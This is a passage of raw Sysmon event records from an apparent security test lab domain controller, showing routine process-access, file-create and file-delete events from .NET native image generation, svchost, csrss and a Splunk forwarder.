AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61366-false10.0.1.12-8000- 10341000x800000000000000018849Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:13.498{4DB9351A-9DDD-60D3-0D00-00000000CF01}9045116C:\Windows\system32\svchost.exe{4DB9351A-9F2B-60D3-C600-00000000CF01}4680C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018848Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:13.482{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A119-60D3-7602-00000000CF01}6560C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018847Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:13.467{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A119-60D3-7602-00000000CF01}6560C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018846Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:13.467{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A119-60D3-7602-00000000CF01}6560C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018845Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:13.389{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A119-60D3-7502-00000000CF01}1300C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018844Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:13.357{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A119-60D3-7502-00000000CF01}1300C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018843Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:13.357{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A119-60D3-7502-00000000CF01}1300C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018842Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:13.310{4DB9351A-A119-60D3-7402-00000000CF01}4212NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\IXZJUAZS00\System.IO.Compression.FileSystem.ni.dll.auxMD5=C3619F644B362A732D4B8842CCC8A32C,SHA256=95942D0894A2CC324E1CB8F5F7EBE423815A70CDD44D45324187BEFAC0546CE1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018841Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:13.310{4DB9351A-A119-60D3-7402-00000000CF01}4212NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\IXZJUAZS00\System.IO.Compression.FileSystem.ni.dllMD5=33E71CB28D694FFD2DB44FBEF03DB6D4,SHA256=0861B01F7978CD2847D6FDEB601B42DCE5A713D4371A377E9DEE25FC54C4093F,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018840Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:13.295{4DB9351A-A119-60D3-7402-00000000CF01}4212C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1074-0\System.IO.Compression.FileSystem.dll2021-06-23 21:01:13.295 10341000x800000000000000018839Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:13.264{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A119-60D3-7402-00000000CF01}4212C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018838Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:13.248{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A119-60D3-7402-00000000CF01}4212C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018837Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:13.248{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A119-60D3-7402-00000000CF01}4212C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018836Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:13.217{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A119-60D3-7302-00000000CF01}512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018835Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:13.201{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A119-60D3-7302-00000000CF01}512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018834Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:13.201{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A119-60D3-7302-00000000CF01}512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018833Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:13.154{4DB9351A-A118-60D3-7202-00000000CF01}6484NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\4N5TI9IFGX\System.IO.Compression.ni.dll.auxMD5=8E3686E20F605642B2A7B2D208BE351E,SHA256=81D27D767CEB7C0FB68AE9E08315EC3C265B60AFD7AFFD33EE0026F6149207A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018832Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:13.154{4DB9351A-A118-60D3-7202-00000000CF01}6484NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\4N5TI9IFGX\System.IO.Compression.ni.dllMD5=CC23BA4E1FEB8DD4EB60BCF24BA1EEA4,SHA256=FC308ED44CA7558556986DD93D57D67FED7D702F8A4B5642C20BC4821E5A58FB,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018831Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:13.139{4DB9351A-A118-60D3-7202-00000000CF01}6484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1954-0\System.IO.Compression.dll2021-06-23 21:01:13.139 10341000x800000000000000018830Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:12.998{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A118-60D3-7202-00000000CF01}6484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018875Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:14.982{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=50F3E54B93FB5C5B245530886056FEC8,SHA256=AA11029E0DDF19400283A2BE9072B7165080A266C122F0C8A55134692AF693D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018874Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:14.748{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11A-60D3-7B02-00000000CF01}6892C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018873Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:14.732{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A11A-60D3-7B02-00000000CF01}6892C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018872Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:14.732{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11A-60D3-7B02-00000000CF01}6892C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018871Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:14.732{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B9AA2187869CE1EFBD05AD5B2282CAA,SHA256=6EC5A37C104CC72881BC73EF78F23108B81E8C73B871A1503A764A390D14D6FF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018870Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:14.685{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11A-60D3-7A02-00000000CF01}2236C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018869Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:14.685{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A11A-60D3-7A02-00000000CF01}2236C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018868Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:14.685{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11A-60D3-7A02-00000000CF01}2236C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018867Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:14.623{4DB9351A-A11A-60D3-7902-00000000CF01}3492NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\LKIJ6N3X9W\System.Management.Instrumentation.ni.dll.auxMD5=3D5CBC515E35F8F7E363B002528517F0,SHA256=8FD1AFA9C6E8813BC31FA5AB1ADBF5476FABDA3CABC4FC88CDAF4C51C2B378A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018866Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:14.623{4DB9351A-A11A-60D3-7902-00000000CF01}3492NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\LKIJ6N3X9W\System.Management.Instrumentation.ni.dllMD5=5EB656CE52B16A317C7CF53B3B6E2131,SHA256=51EC98739C5B189FF84F3358A09D1D002B956FCCEBEE7F8CB35EFB7C011C4A5C,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018865Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:14.607{4DB9351A-A11A-60D3-7902-00000000CF01}3492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\da4-0\System.Management.Instrumentation.dll2021-06-23 21:01:14.607 10341000x800000000000000018864Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 